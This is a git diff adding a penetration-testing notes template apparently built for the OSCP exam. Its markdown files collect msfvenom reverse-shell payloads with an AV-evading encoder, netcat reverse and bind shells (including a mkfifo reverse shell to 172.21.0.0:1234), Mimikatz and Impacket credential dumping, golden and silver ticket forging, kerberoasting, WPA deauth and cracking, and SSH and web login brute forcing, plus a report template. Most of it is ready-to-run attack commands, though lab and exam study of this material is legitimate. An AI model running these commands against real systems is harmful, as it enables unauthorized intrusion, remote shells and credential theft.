+- msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php
+cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
+
+ASP
+
+- msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f asp > shell.asp
+
+JSP
+
+- msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.jsp
+
+WAR
+
+- msfvenom -p java/jsp_shell_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f war > shell.war
+
+## Scripting Payloads
+
+Python
+
+- msfvenom -p cmd/unix/reverse_python LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.py
+
+Bash
+
+- msfvenom -p cmd/unix/reverse_bash LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.sh
+
+Perl
+
+- msfvenom -p cmd/unix/reverse_perl LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.pl
+
+
+Creating an Msfvenom Payload with an encoder while removing bad charecters:
+
+- msfvenom -p windows/shell_reverse_tcp EXITFUNC=process LHOST=IP LPORT=PORT -f c -e x86/shikata_ga_nai -b "\x0A\x0D"
+
+## Resources:
+
+- https://hacker.house/lab/windows-defender-bypassing-for-meterpreter/
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. Exploitation/Netcat Tips.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. Exploitation/Netcat Tips.md
new file mode 100644
index 0000000..93a442b
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. Exploitation/Netcat Tips.md	
@@ -0,0 +1,28 @@
+## Fundamentals:
+
+Connect to a netcat client:
+- rlwrap nc [IP Address] [port]
+
+Connect to a netcat Listener:
+
+- rlwrap nc -lvp [Localport]
+
+More info on rlwrap: https://linux.die.net/man/1/rlwrap
+
+## Backdoor Shells: 
+
+Linux: 
+
+- rlwrap nc [Your IP Address] -e /bin/sh 
+- rlwrap nc [Your IP Address] -e /bin/bash
+- rlwrap nc [Your IP Address] -e /bin/zsh
+- rlwrap nc [Your IP Address] -e /bin/ash
+
+
+Windows: 
+
+- rlwrap nc -lv [localport] -e cmd.exe
+
+Linux netcat reverse shell: 
+
+- rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 172.21.0.0 1234 >/tmp/f
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. Exploitation/Target _1/Notes.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. Exploitation/Target _1/Notes.md
new file mode 100644
index 0000000..e69de29
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/1. General Notes.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/1. General Notes.md
new file mode 100644
index 0000000..d0e5f54
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/1. General Notes.md	
@@ -0,0 +1,43 @@
+## Spawn a tty: 
+
+1. rlwrap nc localhost 80
+
+2. rlwrap -r -f . nc <IP ADDRESS> <PORT>
+
+- socat file:`tty`,raw,echo=0 tcp-listen:12345
+- /bin/sh -i
+- python -c 'import pty; pty.spawn("/bin/sh")'
+- perl -e 'exec "/bin/sh";'
+- perl: exec "/bin/sh";
+- ruby: exec "/bin/sh"
+- lua: os.execute('/bin/sh')
+
+## Priviledge Escalation Scripts:
+
+Windows:
+- Windows Exploit Suggester (Next-Generation): https://github.com/bitsadmin/wesng
+- Sherlock: https://github.com/rasta-mouse/Sherlock
+- Powersploit: https://github.com/PowerShellMafia/PowerSploit
+- WinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
+
+Linux:
+- Linux Exploit Suggester 2: https://github.com/jondonas/linux-exploit-suggester-2
+- LinEnum: https://github.com/rebootuser/LinEnum
+- UnixPriv Checker: https://github.com/pentestmonkey/unix-privesc-check
+- LinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
+
+## Other Resources: 
+
+PowerSharpPack:
+- https://github.com/S3cur3Th1sSh1t/PowerSharpPack 
+
+Windows: 
+- LOLBAS: https://lolbas-project.github.io/#
+- Windows Privilege Escalation Fundmentals: https://www.fuzzysecurity.com/tutorials/16.html
+- SharpSuite: https://github.com/FuzzySecurity/Sharp-Suite
+- Watson: https://github.com/rasta-mouse/Watson
+- WinPwn: https://github.com/S3cur3Th1sSh1t/WinPwn
+
+Linux: 
+- GTFOBins: https://gtfobins.github.io/
+- g0tmi1k Linux Privilege Escalation: https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/2. C2 Frameworks.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/2. C2 Frameworks.md
new file mode 100644
index 0000000..6f3c39f
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/2. C2 Frameworks.md	
@@ -0,0 +1,32 @@
+## Empire C2:
+
+Github: https://github.com/BC-SECURITY/Empire
+
+In Kali Linux: 
+
+apt install powershell-empire
+
+Install Empire Manually:
+
+1. cd /Empire/setup
+2. ./install.sh
+
+- Current Listeners: 
+
+(Empire) > listeners
+[!] No listeners currently active
+(Empire: listeners) > uselistener 
+dbx           http          http_com      http_foreign  http_hop      http_mapi     meterpreter   onedrive      redirector   
+
+
+## Covenant
+
+Source: https://github.com/cobbr/Covenant
+
+Installation on Kali: 
+
+1. apt install dotnet-sdk-2.2
+2. git clone --recurse-submodules https://github.com/cobbr/Covenant
+3. cd Covenant/Covenant
+4. dotnet build
+5. dotnet run
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/BloodHound.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/BloodHound.md
new file mode 100644
index 0000000..e6f97be
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/BloodHound.md	
@@ -0,0 +1,22 @@
+## Source: 
+
+https://github.com/BloodHoundAD/BloodHound
+
+## Pre-Compiled Binaries
+
+https://github.com/BloodHoundAD/BloodHound/releases
+
+## SharpHound: 
+
+https://github.com/BloodHoundAD/SharpHound3
+
+## Bloodhound for python 
+Note: Only compatiable with BloodHound 3.0 or newer
+
+https://github.com/fox-it/BloodHound.py
+
+
+## Gather Data
+
+- import-module .\sharphound.ps1
+- invoke-bloodHound -CollectionMethod All -domain target-domain -LDAPUser username -LDAPPass password
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/File System Information/Target _1.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/File System Information/Target _1.md
new file mode 100644
index 0000000..68755f5
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/File System Information/Target _1.md	
@@ -0,0 +1 @@
+# Fill in results or other information about your target here: 
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Impacket.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Impacket.md
new file mode 100644
index 0000000..cc20009
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Impacket.md	
@@ -0,0 +1,11 @@
+# Generate Silver Tickets with Impacket:
+- python3 ticketer.py -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn>  <user_name>
+- python3 ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn>  <user_name>
+
+# Generate Golden Tickets:
+- python3 ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name>  <user_name>
+- python3 ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name>  <user_name>
+
+# Credential Access with Secretsdump
+
+- impacket-secretsdump username@target-ip -dc-ip target-ip
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Installed Applications/Target _1.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Installed Applications/Target _1.md
new file mode 100644
index 0000000..68755f5
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Installed Applications/Target _1.md	
@@ -0,0 +1 @@
+# Fill in results or other information about your target here: 
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Mimikatz.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Mimikatz.md
new file mode 100644
index 0000000..c7cb78f
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Mimikatz.md	
@@ -0,0 +1,50 @@
+# Mimikatz
+
+Post exploitation commands must be executed from SYSTEM level privileges.
+- mimikatz # privilege::debug
+- mimikatz # token::whoami
+- mimikatz # token::elevate
+- mimikatz # lsadump::sam
+- mimikatz # sekurlsa::logonpasswords
+
+## Pass The Hash
+
+- mimikatz # sekurlsa::pth /user:username /domain:domain.tld /ntlm:ntlm_hash
+
+## Inject generated TGS key
+
+- mimikatz # kerberos::ptt <ticket_kirbi_file>
+
+## Generating a silver ticket 
+
+AES 256 Key:
+
+- mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>
+
+AES 128 Key:
+
+- mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>
+
+NTLM:
+
+- mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<ntlm_hash> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>
+
+
+## Generating a Golden Ticket
+
+AES 256 Key:
+
+- mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name>
+
+AES 128 Key: 
+
+- mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name>
+
+NTLM:
+
+- mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<krbtgt_ntlm_hash> /user:<user_name>
+
+
+
+
+
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Network/Target _1.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Network/Target _1.md
new file mode 100644
index 0000000..68755f5
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Network/Target _1.md	
@@ -0,0 +1 @@
+# Fill in results or other information about your target here: 
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Rubeus.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Rubeus.md
new file mode 100644
index 0000000..0833644
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Rubeus.md	
@@ -0,0 +1,26 @@
+# Source
+
+- https://github.com/GhostPack/Rubeus
+
+Review the opsec notes before compiling the program in visual studio. 
+
+## ASREProasting:
+
+chek for users in the current domain:
+
+- Rubeus.exe asreproast  /format:<AS_REP_responses_format [hashcat | john]> /outfile:<output_hashes_file>
+
+## Kerberoasting:
+
+- Rubeus.exe kerberoast /outfile:<output_TGSs_file>
+
+- Rubeus.exe kerberoast /outfile:hashes.txt [/spn:"SID-VALUE"] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."] 
+
+## Pass the key (PTK):
+
+- .\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt
+
+
+## Using the ticket on a Windows target: 
+
+- Rubeus.exe ptt /ticket:<ticket_kirbi_file>
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Running Processes/Target _1.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Running Processes/Target _1.md
new file mode 100644
index 0000000..68755f5
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Running Processes/Target _1.md	
@@ -0,0 +1 @@
+# Fill in results or other information about your target here: 
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Scheduled Jobs_Tasks/General Notes_.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Scheduled Jobs_Tasks/General Notes_.md
new file mode 100644
index 0000000..5ed0440
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Scheduled Jobs_Tasks/General Notes_.md	
@@ -0,0 +1,16 @@
+# Windows: 
+
+- schtasks
+
+## Impacket: 
+
+- python3 atexec.py Domain/Administrator:<Password>@123@172.21.0.0 systeminfo
+
+
+# Linux: 
+
+- cat /etc/crontab
+- cat /etc/anacrontab
+- cat /etc/frontal
+- cat /etc/anacron
+- systemctl list-timers --all
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Scheduled Jobs_Tasks/Target _1.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Scheduled Jobs_Tasks/Target _1.md
new file mode 100644
index 0000000..68755f5
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Scheduled Jobs_Tasks/Target _1.md	
@@ -0,0 +1 @@
+# Fill in results or other information about your target here: 
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/System Exploitation/Target _1.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/System Exploitation/Target _1.md
new file mode 100644
index 0000000..68755f5
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/System Exploitation/Target _1.md	
@@ -0,0 +1 @@
+# Fill in results or other information about your target here: 
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Users and Groups/Target _1.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Users and Groups/Target _1.md
new file mode 100644
index 0000000..68755f5
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/4. Post Exploitation/Users and Groups/Target _1.md	
@@ -0,0 +1 @@
+# Fill in results or other information about your target here: 
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/Cracking WEP_WPA_WPA 2 PSK Authetication.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/Cracking WEP_WPA_WPA 2 PSK Authetication.md
new file mode 100644
index 0000000..2f697ae
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/Cracking WEP_WPA_WPA 2 PSK Authetication.md	
@@ -0,0 +1,36 @@
+## Capture Handshake
+
+1. airmon-ng start wlan0
+2. airodump-ng mon0 --write capture.cap -c 11
+3. aireplay-ng --deauth 0 -a bb:bb:bb:bb:bb:bb mon0
+
+Convert pcap files for john and hashcat
+
+/usr/lib/hashcat-utils/cap2hccapx.bin input.pcap output.hccapx [filter by essid] [additional network essid:bssid]
+/usr/sbin/hccap2john
+/usr/sbin/vncpcap2john
+/usr/sbin/wpapcap2john
+
+
+## Cracking Handshake with Aircrack
+
+- aircrack-ng -w /usr/share/wordlist/fasttrack.txt 0001.cap
+
+## Cracking Handshakes with Hashcat
+
+- hashcat.exe -m 2500 capture.hccapx rockyou.txt (Dictionary Attack)
+- hashcat.exe -m 2500 -a3 capture.hccapx ?d?d?d?d?d?d?d?d (Brute-Force)
+- hashcat.exe -m 2500 -r rules/best64.rule capture.hccapx rockyou.txt (Rule-Based)
+
+## Cracking Handshakes with John The Ripper
+
+Did you run hccap2john?
+
+- john --format=wpapsk --wordlist=/usr/share/wordlists/rockyou.txt crackmecap
+- john --format=wpapsk-opencl --wordlist=/usr/share/wordlists/rockyou.txt crackmecap
+
+
+
+Other Resources: 
+
+https://github.com/lgandx/PCredz 
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/Hashcat.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/Hashcat.md
new file mode 100644
index 0000000..da4de42
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/Hashcat.md	
@@ -0,0 +1,61 @@
+
+## BENCHMARK TEST (HASH TYPE)
+
+- hashcat -b -m #type
+
+## SHOW EXAMPLE HASH
+
+- hashcat -m #type --example-hashes
+
+## DICTIONARY ATTACK
+
+- hashcat -a 0 -m #type hash.txt dict.txt
+
+DICTIONARY + RULES ATTACK
+
+- hashcat -a 0 -m #type hash.txt dict.txt -r rule.txt
+
+COMBINATION ATTACK
+
+- hashcat -a 1 -m #type hash.txt dict1.txt dict2.txt
+
+## MASK ATTACK
+
+- hashcat -a 3 -m #type hash.txt ?a?a?a?a?a?a
+
+HYBRID DICTIONARY + MASK
+
+- hashcat -a 6 -m #type hash.txt dict.txt ?a?a?a?a
+
+HYBRID MASK + DICTIONARY
+
+- hashcat -a 7 -m #type hash.txt ?a?a?a?a dict.txt
+
+
+## INCREMENT
+
+DEFAULT INCREMENT
+
+- hashcat -a 3 -m #type hash.txt ?a?a?a?a?a --increment
+
+INCREMENT MINIMUM LENGTH
+
+- hashcat -a 3 -m #type hash.txt ?a?a?a?a?a --increment-min=4
+
+INCREMENT MAX LENGTH
+
+- hashcat -a 3 -m #type hash.txt ?a?a?a?a?a?a --increment-max=5
+
+SESSION RESTORE
+
+- hashcat -a 0 -m #type --restore --session <uniq_name> hash.txt dict.txt
+
+
+## Cracking krb5ts Keys
+
+- hashcat -m 13100 --force <TGSs_file> <passwords_file>
+
+## Cracking Asrep keys
+
+- hashcat -a 0 -m 18200 <asrep_file> <password_file> 
+
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/John The Ripper.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/John The Ripper.md
new file mode 100644
index 0000000..b110a6e
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/John The Ripper.md	
@@ -0,0 +1,47 @@
+DICTIONARY ATTACK
+- john --format=#type --wordlist=dict.txt hash.txt
+
+BRUTEFORCE ATTACK
+- john --format=#type hash. txt
+
+MASK ATTACK
+- john --format=#type --mask=?l?l?l?l?l?l hash.txt -min-len=6
+
+INCREMENTAL ATTACK
+- john --incremental hash.txt
+
+DICTIONARY + RULES ATTACK
+- john --format=#type --wordlist=dict.t
+
+
+Other Notes:
+
+BENCHMARK TEST
+- john --test
+
+SESSION NAME
+- john hash.txt --session=example_name
+
+SESSION RESTORE
+- john --restore=example_name
+
+SHOW CRACKED RESULTS
+- john hash.txt --pot=<john potfile> --show
+
+WORDLIST GENERATION
+- john --wordlist=dict.txt --stdout --external:[filter name] > out.txt
+
+CRACKING SSH KEYS:
+
+- /usr/share/john/ssh2john.py id_rsa > hash.john
+- john --wordlist=/usr/share/wordlists/rockyou.txt hash.john
+
+CRACKING KRB5TGS KEYS
+
+- john --format=krb5tgs --wordlist=<passwords_file krb-key.txt
+
+Cracking ASREP Keys
+
+- john --format=krb5asrep --wordlist=<passwords_file asrep-key.txt
+
+
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/Wordlists.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/Wordlists.md
new file mode 100644
index 0000000..602d93b
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/1. Cracking Hashes Offline/Wordlists.md	
@@ -0,0 +1,32 @@
+## Local in Kali: 
+
+/usr/share/wordlists
+
+## Other Resources:
+
+Have I been Pwned
+
+- https://haveibeenpwned.com/Passwords
+
+Seclists: 
+
+- In Kali: apt install seclists
+- Usernames: https://github.com/danielmiessler/SecLists/tree/master/Usernames
+- Passwords: https://github.com/danielmiessler/SecLists/tree/master/Passwords
+
+Crackstation's Dictionary List: 
+
+- https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm
+
+Rainbow Tables (Rainbow Crack):
+
+- http://project-rainbowcrack.com/table.htm
+
+Rocktastic Mega Wordlist:
+
+- https://labs.nettitude.com/tools/rocktastic/
+
+Tools to make your own wordlists: 
+
+- Crunch
+- Cewl
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/1. Identifying Hash Types.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/1. Identifying Hash Types.md
new file mode 100644
index 0000000..81c30dd
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/1. Identifying Hash Types.md	
@@ -0,0 +1,7 @@
+In Kali: 
+
+- Hash-identifier
+
+Online: 
+
+- Hash Analyzer: https://www.tunnelsup.com/hash-analyzer/
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/2. Cracking Hashes Online/Hydra.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/2. Cracking Hashes Online/Hydra.md
new file mode 100644
index 0000000..f6eadaa
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/2. Cracking Hashes Online/Hydra.md	
@@ -0,0 +1,5 @@
+- hydra -l user -P pass.txt -t 10 172.21.0.0 ssh -s 22
+
+- hydra -l users.txt -p /usr/share/wordlists/rockyou.txt -t 172.21.0.0 ssh -s 22
+
+- hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/2. Cracking Hashes Online/Medusa.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/2. Cracking Hashes Online/Medusa.md
new file mode 100644
index 0000000..87ecf79
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/2. Cracking Hashes Online/Medusa.md	
@@ -0,0 +1,13 @@
+- medusa -h target-ip -u [username] -P ../creds/passwords.txt -M http 
+
+- medusa -h 172.21.0.0 -U [path to username file] -P [path to password file] -M ftp
+
+- medusa -H hosts.txt -U [path to username file] -P [path to password file] -M http 
+
+- medusa -h 172.21.0.0 -U [path to username file] -P [path to password file] -M ssh -n 2222
+
+- medusa -h 172.21.0.0 -U [path to username file] -P [path to password file] -M ftp -O log.txt
+
+
+
+
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/2. Dumping Hashes.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/2. Dumping Hashes.md
new file mode 100644
index 0000000..35a4638
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Hashes/2. Dumping Hashes.md	
@@ -0,0 +1,59 @@
+# Windows: 
+
+## Meterpreter HashDump
+
+- run post/windows/gather/hashdump
+
+## Meterpreter Mimikatz (Post Exploitation must be executed from SYSTEM privileges)
+
+- load mimikatz
+- creds_all
+
+DUMP LSA SECRETS
+- lsadump.py sys_backup.hiv sec_backup.hiv
+
+DUMP LOCAL PASSWORD HASHES
+
+- pwdump.py sys_backup.hiv sec_backup.hiv
+
+## reg.exe 
+
+- reg save HKLM\sam sam
+- reg save HKLM\system system
+
+## samdump2
+
+- samdump2 SYSTEM SAM > hashes.db
+
+## Impacket Tools: 
+
+- secretsdump.py -ntds ~/Extract/ntds.dit -system ~/Extract/SYSTEM -hashes lmhash:nthash LOCAL -outputfile ntlm-hashes
+
+If you have the NTDS.dit file and the SYSTEM hive: 
+
+- secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL
+
+# Linux
+
+Requires Root Privileges
+
+- cat /etc/shadow
+
+- cp /etc/passwd and shadow
+- unshadow passwd shadow 
+
+#  OSX
+
+10.5-10.7
+
+- dscl localhost -read /Search/Users/<username>|grep GeneratedUID|cut -c15-cat
+/var/db/shadow/hash/<GUID> | cut -c169-216 > osx_hash.txt
+
+10.8-10.12
+
+- sudo defaults read /var/db/dslocal/nodes/Default/users/<username>.plist ShadowHashData|tr -dc ‘
+0-9a-f’|xxd -p -r|plutil -convert xml1 - -o -
+
+# Other Resources: 
+
+- Lsassy: https://github.com/Hackndo/lsassy
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Passwords/General Notes.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Passwords/General Notes.md
new file mode 100644
index 0000000..6db5b74
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Passwords/General Notes.md	
@@ -0,0 +1 @@
+# Any passwords or hashs that you fine should be documented here. Include steps on how you were able to obtain them from your target:
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Proof_Screenshots/Target _1.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Proof_Screenshots/Target _1.md
new file mode 100644
index 0000000..56b7267
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/5. High Value Information/Proof_Screenshots/Target _1.md	
@@ -0,0 +1 @@
+# Fill in results or other information about your targets here: 
\ No newline at end of file
diff --git a/Pentest_Template_Master_1.0/Pentest Template Master 1.0/6. Reporting/OSCP Report Template.md b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/6. Reporting/OSCP Report Template.md
new file mode 100644
index 0000000..055c5d1
--- /dev/null
+++ b/Pentest_Template_Master_1.0/Pentest Template Master 1.0/6. Reporting/OSCP Report Template.md	
@@ -0,0 +1,365 @@
+
+# <div align="center"> Offensive Security Lab/Exam Penetration Test Report </div>
+
+![d2550626a1c94aeebd273d43be0669c9.png](../../_resources/d2550626a1c94aeebd273d43be0669c9.png)
+
+## <div align="center">  student@emailaddress.com Student-ID </div>
+
+###### <div align="center"> 2020-XX-XX </div>
+
+
+<div style="page-break-after: always;"></div>
+
+## Contents
+
+- 1 Offensive Security Exam Penetration Test Report
+   - 1.1 Introduction
+   - 1.2 Objective
+   - 1.3 Requirements
+- 2 High-Level Summary
+   - 2.1 Recommendations
+- 3 Methodologies
+   - 3.1 Information Gathering
+   - 3.2 Penetration
+      - 3.2.1 System IP: 192.168.x.x
+         - 3.2.1.1 Service Enumeration
+         - 3.2.1.2 Privilege Escalation
+      - 3.2.2 System IP: 192.168.x.x
+         - 3.2.2.1 Service Enumeration
+         - 3.2.2.2 Privilege Escalation
+      - 3.2.3 System IP: 192.168.x.x
+         - 3.2.3.1 Service Enumeration
+         - 3.2.3.2 Privilege Escalation
+      - 3.2.4 System IP: 192.168.x.x
+         - 3.2.4.1 Service Enumeration
+         - 3.2.4.2 Privilege Escalation
+      - 3.2.5 System IP: 192.168.x.x
+   - 3.3 Maintaining Access
+   - 3.4 House Cleaning
+- 4 Additional Items
+   - 4.1 Appendix - Proof and Local Contents:
+   - 4.2 Appendix - Metasploit/Meterpreter Usage
+
+<div style="page-break-after: always;"></div>
+
+## Introduction
+
+The Offensive Security Exam penetration test report contains all efforts that were conducted in order to pass the Offensive Security exam.
+This report will be graded from a standpoint of correctness and fullness to all aspects of the exam.
+The purpose of this report is to ensure that the student has a full understanding of penetration testing methodologies as well as the technical knowledge to pass the qualifications for the Offensive Security Certified Professional.
+
+## Objective
+
+The objective of this assessment is to perform an internal penetration test against the Offensive Security Lab/Exam network.
+The student is tasked with following methodical approach in obtaining access to the objective goals.
+This test should simulate an actual penetration test and how you would start from beginning to end, including the overall report.
+An example page has already been created for you at the latter portions of this document that should give you ample information on what is expected to pass this course.
+Use the sample report as a guideline to get you through the reporting.
+
+## Requirements
+
+The student will be required to fill out this penetration testing report fully and to include the following sections:
+
+- Overall High-Level Summary and Recommendations (non-technical)
+- Methodology walkthrough and detailed outline of steps taken
+- Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable
+- Any additional items that were not included
+
+<div style="page-break-after: always;"></div>
+
+# High-Level Summary
+
+I was tasked with performing an internal penetration test towards Offensive Security Exam.
+An internal penetration test is a dedicated attack against internally connected systems.
